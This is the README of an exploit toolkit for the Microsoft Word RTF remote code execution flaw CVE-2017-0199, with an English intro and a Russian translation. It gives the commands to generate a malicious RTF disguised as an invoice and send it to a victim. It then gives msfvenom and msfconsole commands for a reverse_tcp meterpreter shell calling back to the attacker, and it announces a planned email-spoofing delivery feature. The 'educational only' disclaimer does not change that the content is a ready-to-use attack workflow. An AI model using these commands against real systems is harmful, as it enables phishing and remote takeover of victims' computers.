
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.
Эксплойт-комплект CVE-2017-0199 - v2.0 — это удобный скрипт на Python, который предоставляет быстрый и эффективный способ эксплуатации уязвимости Microsoft RTF RCE. Он может сгенерировать вредоносный RTF-файл и доставить полезную нагрузку metasploit / meterpreter жертве без сложной настройки.
В скрипт добавлены следующие возможности:
- Генерация вредоносного RTF-файла с помощью комплекта
- Запуск комплекта в режиме эксплуатации в качестве мини-сервера HTA + Web
Версия: Python 2.7.13
Разрабатывается следующая функция:
- Автоматическая отправка сгенерированного вредоносного RTF-файла жертве с помощью подмены email
Шаг 1: Сгенерируйте вредоносный RTF-файл с помощью следующей команды и отправьте его жертве
Синтаксис:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Пример:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
Шаг 2 (опционально, если используется полезная нагрузка MSF): Сгенерируйте полезную нагрузку metasploit и запустите обработчик
Пример:
Генерация полезной нагрузки:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Запуск обработчика:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Шаг 3: Запустите комплект в режиме эксплуатации для доставки полезных нагрузок
Синтаксис:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Пример:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяются стандартные оговорки, особенно то, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправильное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), причинённый использованием этих программ, не является ответственностью bhdresh.
@nixawk за образец RTF, @bhdresh
Очевидно, я не являюсь разработчиком на полную ставку, поэтому возможны некоторые сбои.
Пожалуйста, сообщайте об ошибках и проблемах на [email protected]